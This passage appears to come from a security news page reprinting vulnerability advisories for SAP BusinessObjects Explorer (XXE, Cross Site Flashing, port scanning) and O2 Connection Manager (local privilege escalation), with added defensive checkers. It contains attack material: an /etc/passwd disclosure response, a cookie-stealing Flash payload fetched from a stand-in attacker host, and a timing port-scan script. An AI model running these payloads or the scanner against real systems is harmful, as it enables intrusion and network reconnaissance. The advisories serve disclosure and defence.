                HTTP/1.1 200 OK
                [CUT BY COMPASS]
                Content-Length: 214
                <?xml version="1.0" encoding="UTF-8"
=>              standalone="no"?><dataDiscovery><response><explorationSpaceUpdate id="[CUT BY COMPASS]"
                infoObjectCUID="[CUT BY COMPASS]"/></response></dataDiscovery>


The following explorationSpaceDetail request has been used to retrieve
the stored value.

        URL: /explorer/polestar_xml.jsp
        Request extract:
                POST /explorer/polestar_xml.jsp HTTP/1.1
                [CUT BY COMPASS]
                Content-Length: 533
                xmlParameter=%3CdataDiscovery%3E%3Cheaders%3E%3CcorrelationId%3E[CUT BY
                COMPASS]%3C%2FcorrelationId%3E%3CtransactionId%3E[CUT BY
                COMPASS]%3C%2FtransactionId%3E%3C%2Fheaders%3E%3Csession%20token%3D%22[CUT BY
=>              COMPASS]%22%20locale%3D%22en%5FUS%22%2F%3E%3Crequest%3E%3CexplorationSpaceDetail%20id%3D
                %22[CUT BY COMPASS]%22%2F%3E%3C%2Frequest%3E%3C%2FdataDiscovery%3E
        Response extract:
                HTTP/1.1 200 OK
                [CUT BY COMPASS]
=>              <value>root:!:0:0::/:/usr/bin/ksh
                [CUT BY COMPASS]
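The defensive counterpart to the two requests above, and to the neuroML XXE finding earlier on this page, is a parser that never gets as far as declaring an entity. The added example below is not SAP's, neuroML's or Compass Security's code: it uses Python's standard-library expat bindings to abort on any DOCTYPE (so the `<!ENTITY include SYSTEM "/etc/passwd">` declaration is never processed) and to refuse external entity references as a second layer. `HOSTILE` is a constructed document shaped like the advisory's request, and the names `parse_values` and `classify` are ours.

```python
import xml.parsers.expat as expat

# Constructed input modelled on the advisory's request: a DOCTYPE declares an
# external entity pointing at /etc/passwd and the body references it.
HOSTILE = (
    '<!DOCTYPE dataDiscovery [ <!ENTITY include SYSTEM "/etc/passwd"> ]>'
    "<dataDiscovery><request><row><value>&include;</value></row></request></dataDiscovery>"
)
BENIGN = "<dataDiscovery><request><row><value>AT</value></row></request></dataDiscovery>"


class DoctypeNotAllowed(ValueError):
    """Raised as soon as a DOCTYPE appears; this request format never needs one."""


def parse_values(xml_text):
    """Parse untrusted XML and return the text of every <value> element."""
    parser = expat.ParserCreate()
    values, buf = [], []
    state = {"in_value": False}

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before the internal subset is read, so no <!ENTITY> is ever processed.
        raise DoctypeNotAllowed(f"DOCTYPE '{name}' rejected")

    def external_entity_ref(context, base, system_id, public_id):
        # Defence in depth: returning 0 makes expat fail the parse instead of
        # resolving the reference.
        return 0

    def start(name, attrs):
        if name == "value":
            state["in_value"], buf[:] = True, []

    def end(name):
        if name == "value":
            values.append("".join(buf))
            state["in_value"] = False

    def chars(data):
        if state["in_value"]:
            buf.append(data)

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(xml_text, True)
    return values


def classify(xml_text):
    """('accepted', values) | ('rejected', reason) | ('malformed', reason)."""
    try:
        return ("accepted", parse_values(xml_text))
    except DoctypeNotAllowed as exc:
        return ("rejected", str(exc))
    except expat.ExpatError as exc:
        return ("malformed", str(exc))


if __name__ == "__main__":
    for label, doc in (("hostile", HOSTILE), ("benign", BENIGN)):
        print(f"{label:8}", classify(doc))
```

Rejecting the DOCTYPE outright is the simplest robust setting for an application whose XML schema is fixed: there is nothing for a DTD to add, and it removes the whole entity-expansion surface (external entities, parameter entities and entity-expansion denial of service) at once rather than relying on individual parser flags.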


Timeline:
---------
2013-06-06:     Discovery by Stefan Horlacher
2013-06-26:     Initial vendor notification
2014-06-10:     Vendor releases patch and SAP Security Note 1908531
2014-10-10:     Disclosure of the advisory


References:
-----------
[0] https://service.sap.com/sap/support/notes/1908531
[1] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

The Snappening – 200,000 Snapchat accounts hacked

4chan has struck again. First there was the celebrity nude leak scandal, the Fappening, and now there is the Snappening. For a brief history: on August 31, 2014, a collection of private and nude pictures of almost 100 female celebrities was posted on the image sharing website 4chan.org. These were later shared by other users on websites and social networks such as Imgur, Reddit and Tumblr. The world got to see very intimate pictures of some of Hollywood’s largest stars, including Jennifer Lawrence, Kate Upton, Nicki Minaj, Selena Gomez, Scarlett Johansson, Rihanna, Hilary Duff, and Demi Lovato, among others.

This time though, it’s not just nude photos from 100 celebrities. It is nude photos and videos from potentially hundreds of thousands of Snapchat accounts hacked by users of the same website.

more here...........http://kennywithers.com/featured-online-marketing-articles/the-snappening-snapchat-accounts-hacked/

SAP Security Note 1908647 - Cross Site Flashing in BusinessObjects Explorer

#######################################################################
#
# COMPASS SECURITY ADVISORY
http://www.csnc.ch/en/downloads/advisories.html
#
#######################################################################
#
# Product:           BusinessObjects Explorer
# Vendor:            SAP AG
# Subject:           Cross Site Flashing
# Risk:              High
# Effect:            Remotely exploitable
# Author:            Stefan Horlacher
# Date:              2014-10-10
# SAP Security Note: 1908647 [0]
#
#######################################################################

Abstract:
-------------
BusinessObjects Explorer is vulnerable to Cross Site Flashing [1]
attacks, allowing an attacker to, for example, steal the victim's session.
This vulnerability requires the victim to click on a malicious link
prepared by the attacker.


Affected:
---------
Vulnerable:
SAP BusinessObjects Explorer version 14.0.5 (build 882)

Not tested:
Other versions of BusinessObjects Explorer


Technical Description:
----------------------
The Flash file suffers from a Cross Site Flashing vulnerability. It
is possible to directly load and display the
com_businessobjects_polestar_bootstrap.swf Flash file and specify a
configUrl. This requires the victim to be logged in, and the attacker
needs to know the /webres/ URL, which is known as soon as the attacker
is in possession of valid credentials. The configuration file specified
in the configUrl parameter may reside on a foreign host, and the
configuration file itself may contain URLs of further Flash files
residing on a foreign domain. If successful, the victim loads foreign
Flash files, which leads to Cross Site Flashing: the foreign SWF runs
in the security context of the originating domain. The example below
loads a Flash file which injects JavaScript into the DOM of the
originating domain.


        URL: /explorer/webres/[CUT BY COMPASS]/com_businessobjects_polestar_bootstrap.swf?configUrl=http://example.com/attacker_flash_config.xml


        Code of the injected Flash file referenced in http://example.com/attacker_flash_config.xml
                package
                {
                        import flash.display.Sprite;
                        import flash.events.Event;
                        import flash.external.ExternalInterface;

                        public class Main extends Sprite
                        {
                                public function Main():void
                                {
                                        ExternalInterface.call("document.write",
                                        "<script>alert(document.cookie)</script>");
                                }
                        }
                }

        Extract of the manipulated configuration file http://example.com/attacker_flash_config.xml:
                <p:configuration xmlns:p="http://www.businessobjects.com/2007/platform"
                        p:codebase="plugins/">
                <p:splashLocation p:id="com_businessobjects_polestar_splashscreen"
                        p:codebase="http://[CUT BY COMPASS].csnc.ch/[CUT BY COMPASS]/"/>
                <p:bundles>
                        <p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="http://example.com/"/>
                        <p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="http://example.com/"/>
                        <p:bundle p:id="com_businessobjects_polestar_dataprovider_xl" p:codebase="http://example.com/"/>
                        <p:bundle p:id="com_businessobjects_polestar_portal_logoff" p:codebase="http://example.com/"/>
                [CUT BY COMPASS]
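
The following is an added example, not code from Compass Security or SAP: a checker for the condition described above. It parses a configuration file of the shape shown in the extract and reports every codebase that would make the player fetch a bundle from an origin other than the one serving the bootstrap SWF. Relative codebases resolve against the configuration file's own URL, which is why a foreign configUrl is dangerous even when the codebases inside it look harmless. The application origin, the sample configuration (completed from the extract above with constructed hosts) and the allow-list rule a server-side fix would apply to configUrl are assumptions.

```python
"""Cross Site Flashing checker for a polestar bootstrap configuration.

Added example, not Compass Security's or SAP's code.  The sample
configuration is constructed from the advisory's extract; the application
origin and the configUrl rule are assumptions.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urljoin, urlsplit

P_NS = "http://www.businessobjects.com/2007/platform"

# Constructed: the advisory's extract, completed and with example hosts.
SAMPLE_CONFIG = """<p:configuration xmlns:p="http://www.businessobjects.com/2007/platform"
        p:codebase="plugins/">
  <p:splashLocation p:id="com_businessobjects_polestar_splashscreen"
        p:codebase="http://attacker.invalid/splash/"/>
  <p:bundles>
    <p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="http://example.com/"/>
    <p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="bundles/"/>
  </p:bundles>
</p:configuration>
"""


def origin_of(url):
    """(scheme, host, port) with default ports filled in; None if not absolute."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.hostname:
        return None
    port = parts.port or {"http": 80, "https": 443}.get(parts.scheme.lower())
    return (parts.scheme.lower(), parts.hostname.lower(), port)


def foreign_codebases(config_xml, config_url, app_origin):
    """Return [(tag, id, resolved_codebase)] for every p:codebase that
    resolves to an origin other than app_origin.  Relative values are
    resolved against config_url, i.e. against wherever the file was served."""
    expected = origin_of(app_origin)
    findings = []
    for elem in ET.fromstring(config_xml).iter():
        codebase = elem.get(f"{{{P_NS}}}codebase")
        if codebase is None:
            continue
        resolved = urljoin(config_url, codebase)
        if origin_of(resolved) != expected:
            tag = elem.tag.split("}")[-1]
            findings.append((tag, elem.get(f"{{{P_NS}}}id"), resolved))
    return findings


def config_url_allowed(config_url, app_origin):
    """Rule a server-side fix would enforce (assumed; SAP's patch is not
    public here): accept a relative path or an absolute URL on the app's
    own origin.  Protocol-relative values ("//evil/...") are absolute in
    the browser and are rejected; non-http schemes fail the origin test."""
    if config_url.startswith("//"):
        return False
    if not urlsplit(config_url).scheme:
        return True
    return origin_of(config_url) == origin_of(app_origin)


if __name__ == "__main__":
    app = "https://explorer.corp.invalid"            # assumed application origin
    evil = "http://example.com/attacker_flash_config.xml"
    print(config_url_allowed(evil, app))             # False
    for hit in foreign_codebases(SAMPLE_CONFIG, evil, app):
        print(hit)
```

Run against the attacker-hosted URL from the advisory, every codebase in the sample is foreign, including the relative "plugins/" on the root element; served from the application's own origin, only the two absolute attacker URLs remain.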


Timeline:
---------
2013-06-06:     Discovery by Stefan Horlacher
2013-06-26:     Initial vendor notification
2013-12-10:     Vendor releases patch and SAP Security Note 1908647
2014-10-10:     Disclosure of the advisory


References:
-----------
[0] https://service.sap.com/sap/support/notes/1908647
[1] https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project

Automated configuration analysis for Mozilla's TLS guidelines

Last week, we updated Mozilla's Server Side TLS guidelines to add a third recommended configuration. Each configuration maps to a target compatibility level.

more here............https://jve.linuxwall.info/blog/index.php?post/2014/10/09/Automated-configuration-analysis-for-Mozilla-s-TLS-guidelines

SAP Security Note 1908562 - Port scanning in BusinessObjects Explorer

#######################################################################
#
# COMPASS SECURITY ADVISORY
http://www.csnc.ch/en/downloads/advisories.html
#
#######################################################################
#
# Product:           BusinessObjects Explorer
# Vendor:            SAP AG
# Subject:           Potential information disclosure relating to SBOP Explorer
# Risk:              Medium
# Effect:            Remotely exploitable
# Author:            Stefan Horlacher
# Date:              2014-10-10
# SAP Security Note: 1908562 [0]
#
#######################################################################

Abstract:
-------------
BusinessObjects Explorer does not validate the user-defined input of
the CMS name parameter, which consists of a host name and port number.
This can be used to perform a port scan of the network range in which
the BusinessObjects Explorer server is located.
This vulnerability can be triggered by an unauthenticated user.


Affected:
---------
Vulnerable:
SAP BusinessObjects Explorer version 14.0.5 (build 882)

Not tested:
Other versions of BusinessObjects Explorer


Technical Description:
----------------------
The option that lets a user choose the CMS can be disabled in the user
interface. Nonetheless, the client still sends this value to the server,
where it gets interpreted. This allows abusing the feature for port
scanning purposes, as a port's state can be determined from the
response time.

A request with a valid host and open port gets a time-out response
after 10 seconds, while a request to an invalid host name or closed
port returns an error in less than 500 milliseconds.

        URL: /explorer/polestar_xml.jsp
        Request extract:
                POST /explorer/polestar_xml.jsp HTTP/1.1
                [CUT BY COMPASS]
                Content-Length: 187
                xmlParameter=<dataDiscovery><request><logon user="[CUT BY COMPASS]" password="[CUT BY
                COMPASS]" cms="[CUT BY COMPASS: HOST_AND_PORT_HERE]" authentication="[CUT BY COMPASS]"
                locale="en_US" guid=""/></request></dataDiscovery>

        Response extract:
                HTTP/1.1 200 OK
                [CUT BY COMPASS]
                <?xml version="1.0" encoding="UTF-8"?><dataDiscovery>
                <response>
                <status code="ERROR" message="PS_10001_INVALID_CREDENTIALS_LOGON">
                <detail message="Server [CUT BY COMPASS] not found or server may be down (FWM 01003)"/>
                </status>
                </response>
                </dataDiscovery>
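
The timing oracle, as an added example that is not Compass Security's tooling: the logon request is built in the shape shown above, and the transport is a callable so the scan runs offline against a constructed fake that reproduces the two timings the advisory reports (about 10 seconds for an open port, under 500 milliseconds for a closed port or unknown host). The classification threshold, the dummy credentials and authentication value, the fake server and the port list are assumptions.

```python
"""Timing-based port scan through the CMS logon parameter.

Added example, not Compass Security's code.  FakeExplorer stands in for the
vulnerable endpoint and advances its own clock instead of sleeping.
"""
import re
import time
from urllib.parse import parse_qsl, urlencode
from xml.sax.saxutils import quoteattr

OPEN_THRESHOLD_S = 2.0   # assumption: well between the ~0.5 s and ~10 s responses


def build_logon_body(host, port, user="probe", password="probe", auth="probe"):
    """Form body for POST /explorer/polestar_xml.jsp.  The credentials are
    placeholders: the server tries to reach the CMS before it can check them."""
    xml = (
        "<dataDiscovery><request>"
        f"<logon user={quoteattr(user)} password={quoteattr(password)} "
        f"cms={quoteattr(f'{host}:{port}')} authentication={quoteattr(auth)} "
        'locale="en_US" guid=""/></request></dataDiscovery>'
    )
    return urlencode({"xmlParameter": xml})


def probe_port(host, port, send, clock=time.monotonic):
    """Send one logon attempt and classify the port by elapsed time."""
    started = clock()
    send(build_logon_body(host, port))        # the response body is irrelevant
    elapsed = clock() - started
    state = "open" if elapsed >= OPEN_THRESHOLD_S else "closed-or-unknown"
    return state, elapsed


def scan(host, ports, send, clock=time.monotonic):
    """Map each port to its inferred state."""
    return {port: probe_port(host, port, send, clock)[0] for port in ports}


class FakeExplorer:
    """Constructed stand-in for the vulnerable endpoint: it parses the cms
    attribute out of the request and adds the advisory's delay to a fake clock
    (10 s when the port is in open_ports, 0.3 s otherwise)."""

    def __init__(self, open_ports):
        self.open_ports = set(open_ports)
        self.now = 0.0

    def clock(self):
        return self.now

    def send(self, body):
        xml = dict(parse_qsl(body))["xmlParameter"]
        port = int(re.search(r'cms="[^":]+:(\d+)"', xml).group(1))
        self.now += 10.0 if port in self.open_ports else 0.3
        return ('<dataDiscovery><response><status code="ERROR" '
                'message="PS_10001_INVALID_CREDENTIALS_LOGON"/></response></dataDiscovery>')


if __name__ == "__main__":
    fake = FakeExplorer(open_ports={6400, 8080})
    print(scan("cms.internal.invalid", [22, 3306, 6400, 8080], fake.send, fake.clock))
```

Against a real target, `send` would be an HTTP POST to /explorer/polestar_xml.jsp with `Content-Type: application/x-www-form-urlencoded` and `clock` the default monotonic clock; every probe that takes the full time-out is an open port on a host the Explorer server can reach, whether or not the scanner itself can.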


Timeline:
---------
2013-06-06:     Discovery by Stefan Horlacher
2013-06-26:     Initial vendor notification
2013-12-10:     Vendor releases patch and SAP Security Note 1908562
2014-10-10:     Disclosure of the advisory


References:
-----------
[0] https://service.sap.com/sap/support/notes/1908562

Rustock.B Live Debugging - SwishDbgExt, SysecLabs script.

Here we are, part two! I thought rather than doing a live debugging of runtime2 as I discussed in my last rootkit debugging post, I'd debug a different rootkit. I chose Rustock.B (PE386) as it's a pretty notorious rootkit, and in my opinion is a lot of fun to debug. It's always a great learning experience to debug, reverse, and research things for yourself as well. I have a map of rootkits I want to debug and reverse as the weeks go by, so expect many more of these.

more here..........http://bsodanalysis.blogspot.com/2014/10/rootkit-debugging-rustockb-live.html

Telefonica O2 Connection Manager 3.4 Local Privilege Escalation


Telefonica O2 Connection Manager 3.4 Local Privilege Escalation Vulnerability


Vendor: Telefonica S.A.
Product web page: http://www.telefonica.com | http://www.o2.co.uk
Affected version: 3.4.R1 (108)

Summary: O2 Connection Manager helps you manage your internet
connections by getting you connected to the fastest available network.
It automatically connects you to the fastest available network, including
your home broadband if you have a wireless router.

Desc: O2 Connection Manager suffers from an elevation of privileges
vulnerability: an unprivileged user can replace the executable files
with a binary of their choice. The vulnerability exists because of
improper permissions, with the 'F' flag (Full) granted to the
'Everyone' group, making the entire 'O2 Connection Manager' directory,
its files and sub-directories world-writable.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5199
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5199.php


22.09.2014

---

==========================================================================

Arguments Used:
        Filename = "C:\Program Files (x86)\O2CM-CE\O2 Connection Manager"



**************************************************************************
Directory: C:\Program Files (x86)\O2CM-CE\O2 Connection Manager

Permissions:
Type     Username                Permissions           Inheritance

Allowed  \Everyone               Full Control          This Folder Only
Allowed  \Everyone               Special (Unknown)     Files Only
Allowed  BUILTIN\Administrators  Special (DCBA654321)  This Folder and Files
Allowed  NT SERVICE\TrustedInsta Full Control          This Folder Only
Allowed  NT SERVICE\TrustedInsta Special (Unknown)     Subfolders only
Allowed  NT AUTHORITY\SYSTEM     Full Control          This Folder Only
Allowed  NT AUTHORITY\SYSTEM     Special (Unknown)     Subfolders and Files
Allowed  BUILTIN\Administrators  Full Control          This Folder Only
Allowed  BUILTIN\Administrators  Special (Unknown)     Subfolders and Files
Allowed  BUILTIN\Users           Read and Execute      This Folder Only
Allowed  BUILTIN\Users           Special (Unknown)     Subfolders and Files
Allowed  \CREATOR OWNER          Special (Unknown)     Subfolders and Files

No Auditing set

Owner: NT AUTHORITY\SYSTEM
**************************************************************************


Operation Complete
Elapsed Time: 0,234375 seconds.


==========================================================================

Arguments Used:
        Filename = "C:\Program Files (x86)\O2CM-CE\O2 Connection Manager\tscui.exe"



**************************************************************************
File: C:\Program Files (x86)\O2CM-CE\O2 Connection Manager\tscui.exe

Permissions:
Type     Username                Permissions           Inheritance

Allowed  \Everyone               Full Control          This Folder Only
Allowed  BUILTIN\Administrators  Special (DCBA654321)  This Folder Only
Allowed  NT AUTHORITY\SYSTEM     Full Control          This Folder Only
Allowed  BUILTIN\Administrators  Full Control          This Folder Only
Allowed  BUILTIN\Users           Read and Execute      This Folder Only

No Auditing set

Owner: NT AUTHORITY\SYSTEM
**************************************************************************


Operation Complete
Elapsed Time: 0,125 seconds.


==========================================================================

C:\Program Files (x86)\O2CM-CE\O2 Connection Manager>icacls *.exe |findstr "Everyone:(I)(F)"
Elevate.exe Everyone:(I)(F)
locSrch.exe Everyone:(I)(F)
md5sum.exe Everyone:(I)(F)
patch.exe Everyone:(I)(F)
ProfileImp.exe Everyone:(I)(F)
SupportAssistant.exe Everyone:(I)(F)
tscui.exe Everyone:(I)(F)
vcredist_x86.exe Everyone:(I)(F)
WifiProfileImportTool.exe Everyone:(I)(F)
XAU.exe Everyone:(I)(F)

C:\Program Files (x86)\O2CM-CE\O2 Connection Manager>

==========================================================================
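
The check above is a one-liner over `icacls *.exe`; as an added example that is not part of the Zero Science advisory, the following parses full `icacls` output (the format shown in the listings above, including indented continuation lines) and reports every ACE that grants a write-capable right to a principal every local user belongs to, which is exactly the condition that lets a normal user swap tscui.exe for a binary of their choice. The sample output is constructed from the two listings in this advisory and the next one; the principal and rights tables are the usual well-known values and are meant to be extended.

```python
"""Find executables that low-privileged principals may overwrite.

Added example, not Zero Science's code.  SAMPLE_ICACLS is constructed from
the advisory's listings; the principal/rights tables are assumptions.
"""
import re

# Principals any local user belongs to (compared case-insensitively).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "users",
    "nt authority\\authenticated users",
    "authenticated users",
    "nt authority\\interactive",
}
# icacls rights that allow replacing a file's content or the file itself
# (D: delete and recreate; WDAC/WO: rewrite the ACL or take ownership).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "WDAC", "WO"}
# Tokens that describe inheritance rather than rights.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# A principal is Everyone, CREATOR OWNER, or AUTHORITY\Name.  The negative
# lookbehinds keep "NT AUTHORITY\X" from being split as "AUTHORITY\X".
_PRINCIPAL = (
    r"(?P<principal>Everyone|CREATOR OWNER|"
    r"(?:NT AUTHORITY|NT SERVICE|APPLICATION PACKAGE AUTHORITY|"
    r"(?<!NT )(?<!PACKAGE )[\w.-]+)\\[\w .-]+?)"
)
_RIGHTS = r":(?P<rights>(?:\([^)]*\))+)"
ACE_RE = re.compile(r"^" + _PRINCIPAL + _RIGHTS + r"\s*$")
# First line of a record: path, whitespace, first ACE.  The greedy path
# group makes the regex take the shortest principal on the right, so a
# path containing spaces is not mistaken for part of the principal.
FIRST_RE = re.compile(r"^(?P<path>.*\S)\s+" + _PRINCIPAL + _RIGHTS + r"\s*$")

SAMPLE_ICACLS = r"""C:\Program Files (x86)\O2CM-CE\O2 Connection Manager\tscui.exe Everyone:(I)(F)
                                                                BUILTIN\Administrators:(I)(F)
                                                                NT AUTHORITY\SYSTEM:(I)(F)
                                                                BUILTIN\Users:(I)(RX)
C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                            BUILTIN\Administrators:(I)(F)
                                                            BUILTIN\Users:(I)(RX)
Successfully processed 2 files; Failed processing 0 files
"""


def parse_rights(field):
    """Split "(I)(OI)(CI)(RX,W)" into (is_deny, {"RX", "W"})."""
    tokens = re.findall(r"\(([^)]*)\)", field)
    rights = set()
    for token in tokens:
        for right in token.split(","):
            right = right.strip()
            if right and right not in INHERIT_FLAGS and right != "DENY":
                rights.add(right)
    return "DENY" in tokens, rights


def parse_icacls(output):
    """Return [(path, principal, is_deny, rights)] for every ACE in the output."""
    entries, path = [], None
    for raw in output.splitlines():
        if not raw.strip():
            continue
        if raw[0].isspace():                      # continuation ACE for the current path
            match = ACE_RE.match(raw.strip())
            if match is None or path is None:
                continue
        else:                                     # new record: path + first ACE
            match = FIRST_RE.match(raw.rstrip())
            if match is None:                     # e.g. the "Successfully processed" summary
                continue
            path = match.group("path")
        is_deny, rights = parse_rights(match.group("rights"))
        entries.append((path, match.group("principal"), is_deny, rights))
    return entries


def writable_by_low_priv(output):
    """Return [(path, principal, granted_write_rights)] worth investigating."""
    findings = []
    for path, principal, is_deny, rights in parse_icacls(output):
        if is_deny or principal.lower() not in LOW_PRIV_PRINCIPALS:
            continue
        granted = sorted(rights & WRITE_RIGHTS)
        if granted:
            findings.append((path, principal, granted))
    return findings


if __name__ == "__main__":
    for path, who, granted in writable_by_low_priv(SAMPLE_ICACLS):
        print(f"{path}: {who} has {','.join(granted)}")
```

Feed it `icacls "C:\Program Files (x86)" /t` output and it will flag the same files the `findstr "Everyone:(I)(F)"` pipe does, plus the less obvious cases (M, W, or a bare WD/AD in a specific-rights list) that the string match misses.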



//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Telefonica O2 Connection Manager 8.7 Service Trusted Path Privilege Escalation


Telefonica O2 Connection Manager 8.7 Service Trusted Path Privilege Escalation


Vendor: Telefonica S.A.
Product web page: http://www.telefonica.com | http://www.o2.co.uk
Affected version: 8.7.6.792

Summary: O2 Connection Manager will help you to manage your internet
connections by getting you connected to the fastest available network.
Automatically connect you to the fastest available network including
your home broadband if you have a wireless router.

Desc: The O2 Connection Manager's service suffers from an unquoted
search path issue impacting the Import WiFi 'TGCM_ImportWiFiSvc'
service for Windows. This could potentially allow an authorized but
non-privileged local user to execute arbitrary code with elevated
privileges on the system. A successful attempt would require the
local user to be able to insert their code in the system root path
undetected by the OS or other security applications where it could
potentially be executed during application startup or reboot. If
successful, the local user’s code would execute with the elevated
privileges of the application.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5200
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5200.php


22.09.2014

---


C:\>sc qc TGCM_ImportWiFiSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TGCM_ImportWiFiSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : TGCM_ImportWiFiSvc
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>icacls "C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe"
C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                            BUILTIN\Administrators:(I)(F)
                                                            BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\>

---
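
The following is an added example, not part of the Zero Science advisory: given the `sc qc` output above, it lists the image paths Windows tries before the intended one. When a service's BINARY_PATH_NAME contains spaces and is not quoted, CreateProcess tries each prefix that ends at a space, with ".exe" appended, before the full path; because this service starts automatically as LocalSystem, whichever of those files a local user can create runs with SYSTEM privileges at the next boot. Which directories are writable is a constructed assumption for the demo and must be checked on the target (with icacls) in practice.

```python
"""Candidate binaries Windows tries for an unquoted service path.

Added example, not Zero Science's code.  The sc qc text is reproduced from
the advisory; the writable-directory set in the demo is an assumption.
"""
import re
from ntpath import dirname   # Windows path rules regardless of the host OS

SC_QC_OUTPUT = r"""
SERVICE_NAME: TGCM_ImportWiFiSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : TGCM_ImportWiFiSvc
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def binary_path_from_sc_qc(text):
    """Pull BINARY_PATH_NAME out of `sc qc` output (None if absent)."""
    match = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", text)
    return match.group(1).strip() if match else None


def is_unquoted_with_spaces(image_path):
    """The precondition: spaces in the path and no surrounding quotes."""
    return not image_path.startswith('"') and " " in image_path


def hijack_candidates(image_path):
    """Paths tried before the real executable, in CreateProcess order.
    Stops at the first prefix that already names a .exe, i.e. the intended
    image (anything after it is arguments, not path)."""
    if not is_unquoted_with_spaces(image_path):
        return []
    candidates = []
    cut = image_path.find(" ")
    while cut != -1:
        prefix = image_path[:cut]
        if prefix.lower().endswith(".exe"):
            break
        candidates.append(prefix + ".exe")
        cut = image_path.find(" ", cut + 1)
    return candidates


def plantable(candidates, writable_dirs):
    """Keep the candidates whose parent directory the local user can write to."""
    writable = {d.lower().rstrip("\\") for d in writable_dirs}
    return [c for c in candidates if dirname(c).lower().rstrip("\\") in writable]


if __name__ == "__main__":
    image = binary_path_from_sc_qc(SC_QC_OUTPUT)
    hits = hijack_candidates(image)
    # Demo assumption only: pretend "C:\Program Files (x86)\O2" is user-writable.
    print(hits)
    print(plantable(hits, [r"C:\Program Files (x86)\O2"]))
```

For the path in the advisory the candidates are C:\Program.exe, C:\Program Files.exe and C:\Program Files (x86)\O2\Connection.exe; the fix is simply to quote the path in the service's configuration (for example with `sc config TGCM_ImportWiFiSvc binPath= "\"C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe\""`), which makes `is_unquoted_with_spaces` false and empties the list.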



Paper: A Decentralized Public Key Infrastructure with Identity Retention

Public key infrastructures (PKIs) enable users to look up and verify one another’s public
keys based on identities. Current approaches to PKIs are vulnerable because they do not offer
sufficiently strong guarantees of identity retention; that is, they do not effectively prevent one
user from registering a public key under another’s already-registered identity. In this paper, we
leverage the consistency guarantees provided by cryptocurrencies such as Bitcoin and Namecoin
to build a PKI that ensures identity retention. Our system, called Certcoin, has no central
authority and thus requires the use of secure distributed dictionary data structures to provide
efficient support for key lookup.


more here..........http://eprint.iacr.org/2014/803.pdf